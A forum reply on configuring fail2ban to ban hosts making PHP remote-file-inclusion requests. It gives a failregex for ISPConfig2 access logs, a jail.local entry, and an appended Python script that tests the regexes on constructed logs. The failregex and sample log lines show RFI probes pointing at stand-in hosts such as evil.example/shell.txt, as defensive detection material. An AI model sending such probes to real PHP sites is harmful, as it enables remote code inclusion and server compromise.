Hi there
Just a note on your jail.local
A filter I value a lot is [php-url-fopen]
Code:
[Definition]
# Option: failregex
# Notes.: regex to match this kind of request:
#
# 127.127.127.172 - - [26/Mar/2009:08:44:20 -0500] "GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm? HTTP/1.1" 200 114 "-" "Mozilla/
#
failregex = ^<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$
Now, to run this against
Code:
logpath = /var/log/apache*/*error.log
would make no sense, as a call to /index.php? may be valid, of course!
So I just create one in
Code:
/etc/fail2ban/filter.d/
with the name "php-url-fopenAccessLog.conf" and match it to the way ISPConfig2 keeps the logs.
Code:
[Definition]
# Option: failregex
# Notes.: same request pattern as php-url-fopen, but ISPConfig2's access log
#         prefixes each line with ||||-delimited fields before the client
#         address, so the leading \|\|\|\|.*.\|\|\|\| skips past them.
failregex = \|\|\|\|.*.\|\|\|\|<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$
Now I add this to jail.local
Code:
[php-url-fopenAccessLog]
enabled = true
port = http,https
filter = php-url-fopenAccessLog
logpath = /var/log/httpd/ispconfig_access_log
maxretry = 2
Cheers
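As an added example (not part of the post above, and not fail2ban's own code), the script below runs both failregex lines from the post over constructed sample log lines, so you can see which requests the filters catch, why the stock php-url-fopen regex finds nothing in the ||||-prefixed ISPConfig2 log, and how maxretry = 2 keeps a single legitimate "?return=http://..." redirect from getting a host banned. It assumes a simplified stand-in for fail2ban's <HOST> group and an assumed ISPConfig2 field layout of two ||||-delimited fields before the client address; the log lines are constructed, not real traffic.

```python
import re
from collections import Counter

# fail2ban substitutes <HOST> with its own host-matching group; this is a
# simplified stand-in (assumption) that is sufficient for the sample lines below.
HOST_RE = r"(?P<host>[\w.:-]+)"

# The two failregex lines exactly as they appear in the post.
FAILREGEX_APACHE = r'^<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$'
FAILREGEX_ISPCONFIG = r'\|\|\|\|.*.\|\|\|\|<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$'


def compile_failregex(failregex):
    """Turn a fail2ban failregex into a Python regex by expanding <HOST>."""
    return re.compile(failregex.replace("<HOST>", HOST_RE))


def find_failures(failregex, lines):
    """Return the matched host for every line the failregex hits, in order."""
    pat = compile_failregex(failregex)
    hosts = []
    for line in lines:
        m = pat.search(line)  # fail2ban also uses search(); '^' keeps the apache regex anchored
        if m:
            hosts.append(m.group("host"))
    return hosts


def hosts_to_ban(failregex, lines, maxretry=2):
    """Mimic the jail: a host is banned once it reaches maxretry matching lines."""
    counts = Counter(find_failures(failregex, lines))
    return sorted(h for h, n in counts.items() if n >= maxretry)


# Constructed sample lines in plain Apache combined format (not real traffic):
# two remote-file-inclusion probes from one host, two harmless requests from a
# second host (a '?' and a '=' but no URL as the value, and a POST without a
# query string), and one legitimate redirect whose parameter value is a URL.
APACHE_LINES = [
    '10.0.0.5 - - [26/Mar/2009:08:44:20 -0500] "GET /index.php?n=http://evil.example/pizza.htm? HTTP/1.1" 200 114 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [26/Mar/2009:08:44:21 -0500] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [26/Mar/2009:08:45:00 -0500] "GET /index.php?n=about HTTP/1.1" 200 3112 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [26/Mar/2009:08:45:01 -0500] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Mar/2009:08:46:02 -0500] "GET /go.php?return=http://www.example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# The same kind of traffic as ISPConfig2 would log it. The two leading
# ||||-delimited fields (site id and vhost name here) are an assumed layout;
# what matters for the regex is that the client address follows the second ||||.
ISPCONFIG_LINES = [
    'web1||||example.com||||10.0.0.5 - - [26/Mar/2009:08:44:20 -0500] "GET /index.php?n=http://evil.example/pizza.htm? HTTP/1.1" 200 114 "-" "Mozilla/5.0"',
    'web1||||example.com||||10.0.0.5 - - [26/Mar/2009:08:44:21 -0500] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 114 "-" "Mozilla/5.0"',
    'web2||||other.example||||192.0.2.9 - - [26/Mar/2009:08:45:00 -0500] "GET /index.php?n=about HTTP/1.1" 200 3112 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    print("apache filter, apache log   :", find_failures(FAILREGEX_APACHE, APACHE_LINES))
    print("banned with maxretry=2      :", hosts_to_ban(FAILREGEX_APACHE, APACHE_LINES))
    print("ispconfig filter, ispc log  :", find_failures(FAILREGEX_ISPCONFIG, ISPCONFIG_LINES))
    # The stock filter is anchored with '^', so the |||| prefix hides every hit:
    print("apache filter, ispc log     :", find_failures(FAILREGEX_APACHE, ISPCONFIG_LINES))
    print("ispconfig filter, apache log:", find_failures(FAILREGEX_ISPCONFIG, APACHE_LINES))
```

Note the single hit for 198.51.100.7: the regex fires on any parameter whose value starts with http://, so on a site that legitimately passes URLs in query strings the maxretry setting is what keeps real users out of the ban list. Before enabling the jail, run the real log through fail2ban-regex /var/log/httpd/ispconfig_access_log /etc/fail2ban/filter.d/php-url-fopenAccessLog.conf and check that the matched hosts are the ones you expect.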